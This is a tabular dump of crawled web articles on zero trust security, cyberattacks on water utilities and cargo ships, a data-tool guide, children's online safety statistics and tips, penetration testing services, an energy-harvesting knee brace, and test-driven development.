text stringlengths 234 589k | id stringlengths 47 47 | dump stringclasses 62 values | url stringlengths 16 734 | date stringlengths 20 20 ⌀ | file_path stringlengths 109 155 | language stringclasses 1 value | language_score float64 0.65 1 | token_count int64 57 124k | score float64 2.52 4.91 | int_score int64 3 5 |
|---|---|---|---|---|---|---|---|---|---|---|
How Does Zero Trust Security Work?
Zero trust operates on the premise that there are constant threats both outside and inside the network. Zero trust also assumes that every attempt to access the network or an application is a threat. It’s a network security philosophy that states no one inside or outside the network should be trusted until their identity has been thoroughly verified. These assumptions underly the strategy of network administrators, obliging them to design stringent, trustless security measures.
There’s an all-too-common notion that implementing a zero trust architecture requires a complete overhaul of your network. There will certainly be some heavy lifting required, but successful implementation is about having the right framework in place paired with the right tools to execute. Every environment needs to have consistent zero trust. It’s a cultural shift, which is often a bigger change than the technology shift. It involves a mindset and a commitment to changing how access is granted and how security is maintained across the organization.
A Zero Trust Security Strategy Determines the Right Access and the Right Needs
The first step in designing a zero trust architecture is to decide who is allowed to do what – and that’s probably the heaviest lift. You need to determine who gets access to which resources, and that is based on what the resources are so each individual can do their job. And then you need to make sure the devices that people are using are properly secured.
Establishing Zero Trust Access (ZTA) involves pervasive application access controls, powerful network access control technologies and strong authentication capabilities. One aspect of Zero Trust Access that focuses on controlling access to applications is Zero Trust Network Access (ZTNA). ZTNA extends the principles of ZTA to verify users and devices before every application session to confirm that they conform to the organization’s policy to access that application. ZTNA supports multi-factor authentication to maintain the highest degree of verification.
Using the zero trust model for application access or ZTNA makes it possible for organizations to rely less on traditional virtual private network (VPN) tunnels to secure assets being accessed remotely. A VPN often provides unrestricted access to the network, which can allow compromised users or malware to move laterally across the network seeking resources to exploit. However, ZTNA applies the policies equally, whether users are on or off the network. So, an organization has the same protections, no matter where a user is connecting from.
The implementation of an effective ZTA security policy must include secure authentication. Many breaches come from compromised user accounts and passwords, so the use of multifactor authentication is key. Requiring users to provide two or more authentication factors to access an application or other network assets adds an extra later of security to combat cybersecurity threats.
It’s also essential to ensure users don’t have inappropriate or excessive levels of access. Adopting the ZTA practice of applying “least access” privileges as part of access management means that if a user account is compromised, cyber adversaries only have access to a restricted subset of corporate assets. It’s similar to network segmentation but on a per-person basis. Users should only be allowed to access those assets that they need for their specific job role.
Making Sure All the Devices are Secured with Zero Trust
Security of devices also plays a pivotal role in the implementation of an effective zero trust security policy. It is paramount to ensure that the devices people are using have been properly secured. This is particularly important as IoT devices proliferate and become bigger targets for cyberattackers.
Because IoT devices lack the ability to install software and don’t have onboard security features, they are essentially “headless.” As technology has advanced, so has the interconnectedness of IoT ecosystems with the enterprise network and the entirety of the internet.
This new connectivity and the expansion of IP-enabled devices mean IoT devices have become a prime target for cybercriminals. The majority of IoT devices are not designed with security in mind, and many do not have traditional operating systems or even enough processing power or memory to incorporate security features.
A benefit of ZTA is that it can authenticate endpoint and IoT devices to establish and maintain all-inclusive management control and ensure the visibility of every component attached to the network. For headless IoT devices, network access control (NAC) solutions can perform discovery and access control. Using NAC policies, organizations can apply the zero-trust principles of least access to IoT devices, granting only sufficient network access to perform their role.
Developing a Strong Zero Trust Security Policy
When it comes to zero trust security, you need to develop and execute a plan that ensures consistent protocols and policies that are implemented across the entire network. No matter who, where, or what they want to access, the rules must be consistent. That means you need to find zero trust security tools that aren’t cloud-only, for example, because if you run a hybrid network, you need the same zero trust on your physical campus as for your remote workers/assets. Comparatively, few companies are running cloud-only; most have taken a hybrid approach, and yet many zero trust solution providers are developing cloud-only solutions.
Over the past year, organizations have begun to depend more on hybrid and multi-cloud environments to help support their ongoing digital transformation requirements. According to a recent report from Fortinet, 76% of responding organizations reported using at least two cloud providers.
An important aspect to consider is the difference in each of the cloud platforms. Each has different built-in security tools and functions with different capabilities, command structures, syntax and logic. The data center is still another environment. In addition, organizations may be migrating into and out of clouds. Each cloud offers unique advantages, and it’s essential for the organization to be able to use whichever ones support their business needs; cybersecurity must not hinder that. Yet, with each cloud provider offering different security services using different tooling and approaches, each of your clouds becomes an independent silo in a fragmented network security infrastructure – not an ideal set-up.
But, if you have a common security overlay across all of these data centers and clouds, you provide an abstraction layer above the individual tools that gives you visibility across the clouds, control of them, and the ability to establish a common security posture irrespective of where an application may be, or where it may move to.
Consequently, applications can reside anywhere – from on-campus to branch to data center to cloud. This is why it’s so important to make sure your zero-trust approach can provide the same protocols, no matter where the worker is physically located and how they’re accessing company resources.
Implementing a Zero Trust Architecture for Stronger Security
As the network perimeter continues to dissolve, due in part to edge computing technologies and the global shift to remote work, organizations must make use of every security advantage that exists. That includes knowing how to implement a zero trust security strategy. Because there’s so many threats from without and within, it’s appropriate to treat every person and thing trying to gain access to the network and its applications as a threat. Trustless security measures don’t require a total network overhaul but do result in a stronger network shield. By doing the initial hard work of establishing Zero Trust Access and its offshoot, Zero Trust Network Access, you’ll be relieving your IT security team of additional work and significantly upping your security quotient.
View the original post By | <urn:uuid:43c964e3-0800-4afa-bda7-eed1c985b992> | CC-MAIN-2022-40 | https://www.net-ctrl.com/how-to-implement-a-zero-trust-security-strategy/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00792.warc.gz | en | 0.930813 | 1,541 | 2.6875 | 3 |
Discover how AutomaTech is automating, simplifying, and enabling powerful analytical tools to optimize your most important processes.
Cyber Security for Water & Wastewater
Industrial cyber security is critical for operations, such as water and wastewater, that have a wide-spread impact on public safety. While there has been a general rise in ransomware attacks recently, there are options available for wastewater facilities that secure networks and, ultimately, protect the public.
In an effort to educate industrial companies about how to prevent a cyber attack, we created a series that examines breaches across different industries, the consequences of the breach, and how AutomaTech offerings could have helped.
What Happened: In late April, Israel’s National Cyber Directorate announced there had been attempted cyber attacks on command and control systems for the nation’s wastewater treatment plants, pumping stations and, sewage.
The apparent goal for this attack was to raise the chlorine level in the water supply.
How It Happened: Experts believe the attempted attack was a coordinated effort to raise the chlorine levels released into the water while simultaneously sending operators a signal that the chlorine levels were correct.
This means the attack was specifically designed to hide the danger from the control room operators.
Water treatment plants, even in America, are generally considered underprepared against cyber threats, which means few have the tools to detect an attack. This also makes them ideal targets for attackers looking to test methods – essentially using the low level of security of water treatment facilities as a way to “practice” or sell the information for gain. In fact, a water utility facility in Fort Collins, Colorado, has also been hit with ransomware on multiple occasions.
What Were the Aftereffects: While the attempts were unsuccessful, the directorate warned water companies to change their passwords, ensure control system software was updated and take other cyber security measures. If they had been successful, attackers could have caused mild poisoning of the local population.
Israel’s water supply was hit with two more cyber attack attempts in the following months – one on an agricultural water pump – but no serious harm was done.
What Would Have Helped: Bayshore NetWall unidirectional security gateway for IT and OT is a high-speed, hardware and software solution that enforces data replication in only one direction. That means it creates a secure network – shielding and isolating critical assets and sensitive networks from cyber attack and misuse. | <urn:uuid:e782042e-8685-4f5a-a27e-0f59dfcae376> | CC-MAIN-2022-40 | https://automatech.com/exploring-cyber-attacks-and-how-to-stay-protected-wastewater/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00792.warc.gz | en | 0.963109 | 500 | 2.578125 | 3 |
Amidst the vast waters of the world’s oceans, one might think that he/she is far away from any kind of criminal threat. However, that assumption is incorrect, as even cargo ships now fall prey to cyberattacks.
Any system connected to an internet network, no matter the location or time, could be a potential target for those with malicious intent. Multiple attacks targeting ships, featuring malware, ransomware, and worms have been witnessed in the past and continue to pose a threat to shipping operations worldwide.
The international shipping industry understands this threat and has recently published the latest guidelines for bolstering cybersecurity on ships. A conglomerate of 21 international shipping associations and industry groups has published the third edition of its document on this matter - “Guidelines on Cyber Security onboard Ships”.
The existence of such a document indicates the significance of this issue. A series of attacks over the past few years has pushed the shipping industry to enhance its cybersecurity efforts. Let us look at some of these past incidents which are not widely known by the public.
Nowadays, many modern ships are designed to operate in a paperless way, using the Electronic Chart Display and Information System (ECDIS). However, if this system fails, it could cause a major hindrance in the ship’s operations and result in a large financial loss for the operating company as well. This is exactly what happened in an incident detailed in the document.
“A new-build dry bulk ship was delayed from sailing for several days because its ECDIS was infected by a virus. The ship was designed for paperless navigation and was not carrying paper charts. The failure of the ECDIS appeared to be a technical disruption and was not recognized as a cyber issue by the ship’s master and officers.
“A producer technician was required to visit the ship and, after spending a significant time in troubleshooting, discovered that both ECDIS networks were infected with a virus. The virus was quarantined and the ECDIS computers were restored. The source and means of infection in this case are unknown. The delay in sailing and costs in repairs totalled in the hundreds of thousands of dollars (US).”
The people aboard the ships can also become a part of the threat vector in some cases. The attackers can use infected USB drives and malicious email attachments to deliver malware, which can end up infecting the software systems aboard the ship. The document notes that in one such incident, a shipowner reported that the company’s business networks were infected with ransomware, delivered via an email attachment.
The guideline covers many such incidents and provides recommendations relevant to each of them. It also covers the various aspects of cyber risk management approach.
As modern ships add more and more systems online, the frequency of such attacks is expected to increase. Though some systems are designed with security features in mind, many often lack appropriate security measures.
Just like in the case of network routers and servers, which are often left with their default login credentials unchanged, many ship systems also end up exposed in the same way. Moreover, they sometimes contain built-in backdoor accounts which risk exposure for the ship, cargo, and the passengers onboard.
Last year, the NotPetya ransomware cost Merck a whopping $300 million and the damage didn’t end there. 4,000 company servers and 45,000 PCs also had to be reset to ensure security in the company’s operations.
This incident was a major wake-up call for the shipping industry which is reflected in the latest cybersecurity guidelines. | <urn:uuid:484818d3-7608-4b23-870a-f506b385d136> | CC-MAIN-2022-40 | https://cyware.com/news/hackers-have-been-peppering-cyberattacks-against-cargo-ships-8b530b26 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00792.warc.gz | en | 0.972079 | 732 | 2.59375 | 3 |
Use Build Features to create features and establish relationships between data in separate tables. The tool uses primitives to build features from the data you provide.
The Build Features tool has 2 anchors.
- Input anchor: The input anchor connects to the data streams you want to build features from. The 2 angle brackets on the input anchor indicate that it accepts multiple inputs.
- Output anchor: Use the output anchor to pass the data that includes the features you build downstream.
Configure the Tool
To use the Build Features tool, you have to configure options that manage relationships between your data and manage primitives that build the features from your data.
1. Manage Relationships
- Select the Manage Relationships tab. You should see this section by default when you open the Configuration window for the first time.
- Select the Target Table.
- Choose a Primary Key from the dropdown. You only have to choose a primary key for the target table, but selecting a primary key for other tables might help you create relationships, depending on how many relationships you want to create.
- Define parent-child relationships between tables in your data. Choose the Parent table and its Key, as well as the Child table and its Key.
- Select New relationship if you want to add more than one parent-child relationship.
2. Manage Primitives
- After you've created all the relationships you want, go to the Manage Primitives tab.
- Search for the primitives you want to build from the data. To see a list of primitives with their explanations, visit this page.
- Check the box next to those primitives.
- Choose the Table Depth, which specifies how many tables the tool should look at when using aggregation primitives. Those kinds of primitives build features by combining, or aggregating, data from multiple tables.
At a high level, primitives are functions applied to raw data that help build features from it. Those functions can either aggregate or transform the data to build features. Primitives only constrain the input and output of data, so you can apply the same features in many different scenarios. For example, 1 primitive measures the average time between 2 dates. You can apply that primitive in many different scenarios, like to measure the duration of semesters, seasons, or tenures. In that way, a single primitive can be used in different contexts to answer different questions about your data. For more information about how primitives work, visit this page. | <urn:uuid:2ddbf601-5338-4666-a6bf-00027d2a12e0> | CC-MAIN-2022-40 | https://help.alteryx.com/20221/designer/build-features | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334596.27/warc/CC-MAIN-20220925193816-20220925223816-00192.warc.gz | en | 0.879631 | 522 | 2.875 | 3 |
Internet safety for kids is a topic that’s not addressed properly. Many people don’t realize the dangers of internet activity and the need to bolster kids online safety is ever greater.
The stranger danger scare easily applies to a random creepy person your kid might run into on the street. Most kids know better than to go near them.
But what happens when their friend—whom they’ve been opening up to for months, building a solid, trusting emotional relationship—wants to meet in real life?
How does a parent deal with classmates who’ve created a group on social media dedicated solely to humiliating, embarrassing, and spreading rumors about their child?
In the following text and infographic, you’ll learn all the most recent information on internet safety for kids, and the real scale of potential threats.
Latest Kids Online Safety Statistics [Editor’s Choice]
- 70% of kids encounter sexual or violent content online while doing homework research
- 17% of tweens (age 8-12) received an online message with photos or words that made them feel uncomfortable, only 7% of parents were aware of this
- 65% of 8-14 year-olds have been involved in a cyberbullying incident
- 36% of girls and 31% of boys have been bullied online
- 16% of high school students have considered suicide because of cyberbullying
- 75% of children would share personal information online in exchange for goods and services
We collected information from reputable sources: comparative studies with over 100,000 participants, 2018’s Parental Control reports, government websites, Child Protective Services, and cybersecurity companies.
In addition, we examined all aspects of children’s online behavior, such as smartphone ownership rates, time spent online, time spent on social networks, and positive, as well as negative, online experiences.
We took notice of the demographics: data on kids’, tweens’, and teens’ age, gender, and country, including the US, China, Brazil, and Italy.
You’ll see detailed descriptions of kids’ exposure to the most common online threats like cyberbullying, scams, adult content, and online predators.
We also listed just how aware both kids and parents are of issues like online safety for kids, cyberbullying, and children’s overall online presence.
Do kids turn to their parents when they need help with online harassment?
Do parents talk to their kids about how to stay safe online?
Do they use parental control software?
To what degree?
We’ll conclude with some tips on staying safe on the internet, for both parents and their offspring.
We also included the tools and resources that can help you monitor and optimize your kids’ online behavior.
Our goal is to help them make the most of the internet, without falling victim to its many pitfalls.
Sexting, Sextortion, and Trust: How Can We Keep Children Safe from Online Predators?
1. 1 out of 7 children have sent messages with sexual content, while 1 in 4 admits they’ve received these kinds of messages.
A 2018 study came to these worrying conclusions. In 39 studies (with 110 ,380 participants), kids aged 11 to 17 were surveyed. A sext can include language, photos, or videos featuring sexual content.
These kids’ unwitting decisions can ruin lives, and damage their self-esteem, even future career prospects. This is why they need to understand how to be safe on the internet.
Sometimes kids send pictures consentingly, but after a breakup or a disagreement, a friend or a boyfriend can post them online.
The aggressor’s motivation could be revenge, pettiness, jealousy, or even a minor disagreement. Once the explicit pics are on the web, users can download them, take screenshots, and forward them.
2. 20% of teenagers have sent or posted nude or semi-nude photos or videos of themselves.
According to Guard Child, 26% of teenagers don’t believe that the person to whom they sent the pics will forward them to someone else.
This trust is so complete that 15% of teens have sent or posted this objectionable content to someone they only knew online.
A number of online friends can turn out to be adults, adults posing as kids, classmates, or ex-partners who end up harboring a grudge.
3. 11% of young teen girls aged 13–16 have sent or posted nude or semi-nude photos or videos of themselves.
Kids as young as 13 are particularly vulnerable when it comes to outside influence.
This includes strangers who’ve built a relationship with them over time, as well as their peers and classmates. Kids seek approval, and this need sometimes outweighs common sense.
One of the main conversations you need to have with your kid, therefore, will start with the obvious question, “Why is internet safety important?” Explain the far-reaching consequences of their actions, and help them understand how to protect themselves.
4. The prevalence of forwarding a sext to others without consent is 12%, while only 8.4% of kids admitted someone forwarded a sext to them.
So much for trust, right?
It turns out that peers and even adults posing as peers can ask for explicit pictures of teenagers and then forward them to others without their consent.
If you care about how to keep your kids safe online and on their phones, you must consider this stat.
What’s worse, many kids don’t realize that this is illegal. According to the Department of Justice and Crime Prevention, “if a child aids, abets, induces, incites, instigates, instructs, commands, counsels, or procures another child to take and send such a photo of the latter to the first child or another person, he or she will be guilty of an offense.”
A conviction may lead to a hefty fine, but that’s not the worst part. In particularly nasty cases, a conviction might lead to imprisonment or even registration with the National Register for Sex Offenders.
Sometimes, cyber safety for kids includes making sure your kid is neither the victim nor the aggressor.
5. Suicide is the second most common cause of death in adolescents aged 15–19.
Kids are in more danger of killing themselves than of dying of any sort of disease.
The “deal with it” or “get over it” attitude can only take you so far. In fact, cyberbullying and harassment have conclusively been linked to depression.
Regardless of your attitude, the numbers show that internet safety for kids should be on every parent’s mind.
According to a 2018 paper by Young Minds, young people who use social media are most vulnerable to a low sense of well-being, as well as symptoms of anxiety and depression.
In 2012, 15-year-old Audrie Pott commit suicide after she had been sexually assaulted at a party eight days prior.
The boys who assaulted her posted nude pictures of her online, and accompanied them with bullying and cyberbullying.
Her death was one of the tragedies that started an avalanche, making people around the US face the real danger of cyberbullying and address how to keep kids safe online.
In 2016, a documentary titled Audrie and Daisy, premiered at the Sundance Film Festival, detailing the experiences of Audrie Pott and Daisy Coleman, a girl with similar experiences who lived.
6. Only 25% of the children who’ve received a sexual solicitation told a parent.
According to the Crimes Against Children Research Center, even though kids may place too much trust in peers and even strangers online, the same does not apply to parents. The fear of an overreaction, being blamed, or even something like having internet access taken away can stop kids from asking for help.
7. 20% of teens have met up with an online friend in person.
It’s important that your child knows the importance of cybersecurity and how to stay safe on the internet.
However, what happens when online dangers become a problem offline?
Agreeing to meet a stranger can be a whole new level of dangerous.
A 2015 Pew Research Center report exploring friendship in the digital age conducted a survey involving kids aged 13 to 17. 57% of teens have met a new friend online.
Considering this, it’s no wonder that at least some of them feel comfortable extending that friendship to their offline lives. Making sure you know who your kids are interacting with is certainly among our internet safety tips for raising teens.
8. 1 in 4 stalking victims also reported some form of cyberstalking, often taking place via email (83%) or instant messaging (35%).
People might check social media profiles of their crushes or employees, jokingly referring to this as cyberstalking. But this couldn’t be further from the real danger. Today, the United States has cyberstalking and cyberharassment legislature.
Did you know that the pictures you share online can be traced to your location, even if you don’t tag it on Facebook?
Smartphone location services place a stamp that can be used by computer-savvy web users to find out where a kid is located. To prevent cyberstalking, consider using a VPN, a type of software that encrypts data traffic, making it difficult for others to access your data.
If you, your friends, your child, or your friend’s child are experiencing any of the types of bullying or cyberbullying we’ve discussed, you can get support by calling a suicide hotline number or the national suicide hotline (1-800-273-8255) or by using their chat option, available 24/7 across the US. Trained, experienced individuals will offer compassion, advice, and useful resources.
Internet Safety For Kids – Depression, Cyberbullying, & Social Media Safety
9. 90% of teens who participate in social media have ignored the bullying they’ve witnessed.
Out of said 90%, a third have been victims of cyberbullying themselves. The grin-and-bear-it attitude surrounding this phenomenon has led to many damaging consequences for kids and parents, even though cyberbullying can seem silly to a casual observer.
So what can be done when friends aren’t willing to help?
Keep in mind that young people aged 16–24 spend an average of 34.3 hours a week on the internet.
For teens, cyberbullying is a real problem. Their online presence is at least equally important as how they appear in real life.
It should come as no surprise, then, that kids who’ve experienced cyberbullying can develop serious conditions, including anxiety and depression.
Friendships are destroyed, and in some cases, leaked photos and videos can even cause long-term damage to a kid’s reputation as an adult.
10. 95% of schools already impose some kind of restriction on mobile phones during the school day.
Every school implements its own internet safety practices. Some merely install parental control onto the school’s Wi-Fi, while others forbid mobile phone use during school hours altogether.
Schools want to ensure that kids are safe from risks like cyberbullying, online grooming, and harmful content.
Grooming stands for “when someone builds an emotional connection with a child to gain their trust for the purposes of sexual abuse, sexual exploitation, or trafficking.”
Internet safety for elementary students and middle and high schoolers is important because along with making students safer, it also leaves them more focused on class.
11. According to a 2018 survey, 58% of parents check which websites their teens visit, and look through their kids’ call records and messages.
While most parents resort to checking kids’ online behavior manually, 52% also use software as the best way to handle internet safety for kids, which restricts which websites the child can visit.
Age plays a big part here: 72% of parents of 13- to 14-year-olds look through their child’s cell phone, compared to 48% of parents of teens aged 15 to 17.
12. Only 25% of teens socialize with friends in person on a daily basis outside of school.
This stat highlights the significance of online communication more than any other. In their free time, kids choose to communicate online, which is why online representation is so important to them.
Learning how to keep kids safe online becomes vital when you see that this is their primary channel for seeking connection, affection, approval, and validation.
13. 16% of boy gamers (13–17) play in person with friends on a daily or near-daily basis, and an additional 35% do so weekly.
With gamer kids, the stats are even worse. Their self-esteem and happiness levels tend to be based on gaming skills.
Internet games for kids and adults alike can become a problem for particularly vulnerable teens.
That’s why ganking (a big group of players teaming up on one lone player) is sometimes categorized as a type of online bullying.
14. 88% of teens online believe people share too much information about themselves on social media.
Pics or it didn’t happen, right? According to a 2018 article by Net Nanny, 10 of the most dangerous teen chat sites—like Kik, Snapchat, Ask.fm, Whisper, and Blendr—can easily bypass parental controls. On Kik, kids can exchange messages parents can’t see, and it’s also very difficult to confirm the participants’ identities.
Snapchat allows users to determine when messages they send will self-destruct, leaving an illusion of anonymity. Screenshots take care of that, of course, proving once more that everything posted online stays online forever.
Among these teenage chatting sites, Ask.fm is so scary that the former UK Prime Minister, David Cameron, urged parents to ban the app.
There are no age restrictions, and groups are formed based on GPS location, a serious liability since potential predators can easily learn a kid’s location.
15. 18% of kids aged 1–7 have social media profiles.
This is another big reason to consider instituting some online safety rules. After all, the age limit for creating an account on Facebook and Instagram is 13.
SnapChat users aged under 13 are redirected to Snapkidz. The minimum age for the mobile phone messaging app WhatsApp is 16 years old.
There are a few ways that you can manage what your kids are doing online. First and foremost, a family password manager is a good idea.
You can make an account for your child on any platform they regularly visit and then enable restricted mode on all the devices they use.
All passwords will be known to you, and you’ll be able to keep them and yourself safe from potential breaches.
16. Around three-quarters of 12–15-year-olds are aware of online reporting functions, and 1 in 8 who go online have used one to report something that bothered them.
Bystander apathy seems to extend to the internet. For those unfamiliar, it’s a social and psychological phenomenon where people are less likely to help a victim when other individuals are present.
17. 17% of children aged 12–15 admitted to accidentally spending money online—almost double the percentage from 2017 (9%).
A 2018 OF.com report came up with these surprising results. Parents who don’t want to lose money obviously need to provide a sort of kids’ guide to the internet.
It’s a fast way to ensure that if a child blows through their money on trivialities, at least it’s on purpose. Provided that these kids weren’t lying about the accidental nature of their actions, it’s surprising that they seem to know less about the way online purchases work.
18. 45% of kids aged 3–4 use Youtube, 80% use it to watch cartoons, and 40% watch funny videos and pranks.
On the other hand, 70% of kids aged 5–7 use Youtube, and 4% have social media profiles. Here’s a good reason to set something up like Google safe search for kids (but more on that in the next stat).
If you leave your child alone with a mobile device and just let the videos go on shuffle, they can easily be exposed to many violent, frightening, and otherwise damaging videos and images.
Downloading a free adblock program would be a good way to solve this.
You should also provide reliable android virus protection or get virus protection for any iPhone device that your kid might use. After all, kids are more likely to unknowingly click on malware or phishing emails than you are.
19. About 8 in 10 parents of 3–15-year-olds online knew about at least 1 of the 6 content filtering tools they were surveyed about. And more than half of parents of 3–4-year-olds (56%) and 5–15-year-olds (59%) used at least one of them.
A website content filter is designed to reduce recreational internet use and restrict access to content that would be deemed objectionable by a parent, school, or enterprise.
A web filter blocks pages from websites that are likely to include objectionable advertising, malware, viruses, and pornographic content. While it’s good that so many parents know about these programs, their use could be even more widespread.
The best free internet filter you can use is Qustodio Free. It may be aimed at Windows, but it’s also available for Mac, Android, iOS, Kindle, and (weirdly) Nook.
Windows Live Family Safety and Open DNS FamilyShield are more family-oriented and will block domains on your whole home network.
If you want to generate only cherry-picked, safe results, Kiddle is probably the best kids’ search engine for you.
20. 19% of parents had no idea whether or not their kids had SnapChat accounts.
In addition, 22% of parents were aware that their children had a Twitter account.
Cyberbullying can become an issue on any social media website. Because of this, not knowing if your kid has a SnapChat account—or any social media account—can be a problem.
21. 59.68% of parental control notifications were triggered by children visiting online communication sites.
All the more reason why social media safety for teens is an issue you ought to take seriously. It seems like no stat was actually needed to let you know your kid spends all of their time on Instagram and SnapChat.
22. 22.4% of parental control notifications were triggered by children’s software, video, or audio consumption.
Images or videos featuring alcohol, tobacco, or narcotics triggered 6.32% of the parental control notifications. And kids’ computer games triggered 4.99% of parental control notifications.
10 Tips About Internet Safety for Kids
- Don’t lie about your age.
- Avoid private forums and chat rooms that require an email address, home address, or phone number.
- Don’t ever give out your own or your family’s personal information.
- Create strong passwords and update them regularly.
- Don’t accept strangers’ friend requests, don’t add strangers, don’t chat with strangers, and never make emotional connections with them.
- Set the privacy settings on your media accounts, make sure your profile details are only visible to friends.
- Never share personal photographs or videos, and never engage in sexting. Everything that happens on the internet stays on the internet forever.
- Disable location services.
- Only purchase items from reputable websites.
- Most of all, block anybody who makes you feel uncomfortable. Report them to your parents, teachers, or even the authorities.
Get the best parental control app for your phone: these options include Qustodio, NetNanny, Symantec Norton Family Premier, Kaspersky Safe Kids, Circle with Disney, Clean Router, and Mobicop.
There are also computer monitoring and parental control software options. These include K9 Web Protection, Qustodio, Family Time, Windows Live Family Safety, Norton Online Family, NetNanny, and Kidlogger.
If you’re looking for Google parental controls, Family Link allows parents to set screen time limits, lock devices when it’s time for a break, approve or block apps downloaded from the Play Store, and locate their kids through their devices. Technically, it’s available to anyone with an existing Google account.
And finally, there is also an Android parental control option: When you turn on parental controls, you can restrict what content can be downloaded or purchased from Google Play based on maturity level.
For family members who manage their own accounts, parental controls only apply to the Android device you add them onto.
For family members whose accounts are managed with Family Link, you can set up parental controls on your child’s Google Account.
So how do you explain internet safety to a child?
Conversations between kids and parents need to include some ground rules: Don’t give away private information about either yourself or your family.
Do not send, download, or forward explicit photos, texts, or videos of either yourself or other kids. Report a bully to the page administrator, a parent, or an authority at your school.
And most of all, be open in your parent-child communication. In the long run, it’s better for you and your kids when they can trust you, not fear you, so that you can work together if something ever does go wrong online.
As we can see, internet safety for kids needs to be as major an issue for parents as what happens in their kids’ offline lives.
Put simply, the stats and tips we’ve provided here are designed to educate you and your kids, while helping you all communicate better about being safe online. | <urn:uuid:f2172c9a-2105-4b8b-b3fd-1ddc99681026> | CC-MAIN-2022-40 | https://safeatlast.co/child-security/kids-online-safety/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334596.27/warc/CC-MAIN-20220925193816-20220925223816-00192.warc.gz | en | 0.939763 | 4,611 | 3.078125 | 3 |
Penetration testing (ethical hacking) is utilized by organizations to validate that their information assets are secure against attacks both from inside and outside the infrastructure. A critical complement to vulnerability scanning, penetration testing proves the extent to which vulnerabilities can be exploited by emulating what a hacker may do in a controlled and methodical manner.
IT Security C&T offers comprehensive Network Penetration Testing to identify security vulnerabilities on the network level whereas operating systems, web servers, network devices, mail systems, FTP servers, etc. will be assessed for known security weaknesses and whether it can be exploited. This test reveals a hacker’s view of the network and will help understand security preparedness of the Network to defend itself against evolving threats.
- Executive Report: A high-level snapshot of all existing vulnerabilities, activities, and penetration test results
- Detailed Technical Report: this report details the following:
a. Automated vulnerability scanning & reporting
b. Manual verification of vulnerabilities reported (Exploitation of known vulnerabilities)
c. Detailed report including evidence of exploits with attack steps | <urn:uuid:0ed59918-f585-4f59-bc86-e520fd96d1af> | CC-MAIN-2022-40 | https://www.itsecurityct.com/page.php?id=cT49VcT49Va16167AcT49VcT49V | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00192.warc.gz | en | 0.903679 | 222 | 2.671875 | 3 |
Researchers have created a new knee brace device that can harvest energy normally dissipated or essentially wasted from the human body during walking.
While it’s not shocking that power can be generated this way, it may be surprising to hear how much electricity the device can produce: five watts, enough to run 10 cell phones.
The journal Science first reported the news and scientific results of a study of the brace, which was created by researchers from Simon Fraser University in Burnaby, British Columbia; the University of Pittsburgh; and the University of Michigan.
Harvesting Wasted Energy
Unlike hand crank-based power generators, the new knee brace doesn’t require much from the user — in fact, the researchers who created the brace found that a human seems to expend less than one watt of energy wearing the brace while the brace harvests a full watt. No scientists have claimed to have messed with the laws of physics here — energy from walking is going somewhere — it’s just that the brace is surprisingly efficient, they say.
“We really wanted to take advantage of the negative work that is being done by the hamstring in trying to decelerate or stop the leg, and that negative work is dissipated as heat, and rather than turning it into heat, we turn it into electricity or power,” Yad Garcha, CEO of Bionic Power, told TechNewsWorld. Bionic Power is a new company formed to develop and market the device for commercial use.
Very Much a Prototype
While long-distance runners may dream of being able to charge their iPods while on the go, real-world use isn’t quite ready for prime time. The knee brace is a prototype, and it needs a bit of work before off-the-grid users will be converting their own power to portable electricity.
“We want to reduce the weight and the size of it,” Garcha said. “Right now, it’s an off-the-shelf brace that we are using, but ideally we could use a brace with this product in mind, and as a result we are in discussions with some of the athletic brace manufacturers to design a very lightweight brace.”
“We need to move the control system on board — currently it resides on our PC,” he explained. “Then we are trying to improve the sensors, so that we know when the subject is walking uphill, downhill, going up stairs or down stairs so that we can vary the amount of power that we are generating. At times we can generate more and sometimes we need to generate less. We want this to be very much in the background and passive, and the only way you can do that is to know exactly what kind of activity is involved.”
In fact, the knee brace actually seems to help the wearers as their foot hits the ground, softening the effort required by the knee and the pressure on the knee during walking. Bionic Power believes that athletic brace manufacturers will be able to make the brace portion of the bionic knee even more ergonomic and comfortable for long-term use.
Forget the Batteries
One of the first places this new device may show up is on the battlefield. Military personnel carry pounds of disposable batteries for a variety of electronic gear. One study, Garcha noted, found that Canadian soldiers carry so many batteries that each soldier’s battery use costs about US$57,000 per year — and American soldiers use even more.
“The problem for the soldier is not just the cost, it is the weight — it’s a limiting factor for them,” Garcha said. To reduce the weight, soldiers have to choose between taking less batteries for their devices, such as critical GPS (global positioning system) or communications units, or taking less food, water or ammunition — none of which are good options.
Other uses may be to power prosthetic devices for disabled persons, provide power in off-the-grid developing nations, or for consumer applications for outdoor enthusiasts who are increasingly taking iPods, cell phones, GPS units and walkie talkies into the backcountry. | <urn:uuid:5da2a2b9-4dbd-483b-9f2d-7c0d8e0af0d2> | CC-MAIN-2022-40 | https://www.ecommercetimes.com/story/tricked-out-knee-brace-generates-power-while-you-walk-61600.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00192.warc.gz | en | 0.956923 | 859 | 3.515625 | 4 |
Test-Driven Development (TDD) is a development paradigm where tests are written before the code. It may seem like putting the cart before the horse, but the idea is that tests are written to test the design first and then test the code according to the design.
The main hurdle with TDD is that it takes longer to create useable code, but that code will be more stable, easier to integrate, maintain, and update with new features. Even though the initial development takes longer, over the lifespan of the code this is the more efficient approach.
TDD forces the developer to walk through the logic before writing a line of code, which clarifies ideas and provides a better overall understanding of the feature to be implemented. Also, it forces the developer to organize the code to simplify testing, reduce the number of embedded loops and ifs, and consolidate and generalize the code (avoid writing similar code multiple times).
A major part of writing tests involves designing mock test data. Multiple tests will use the same data or a slight variation of it. The test data should be unified, parameterized, and should come from a single source. A comprehensive version of objects to be mocked should be built, even if not all fields will be useful at this stage. The mocked data represents the state for different processing points, so special attention should be payed to the consistency of the data. Mocked data may be used in two ways: as input and to verify the output. This allows for tests to be split into units that work between different execution points in the code.
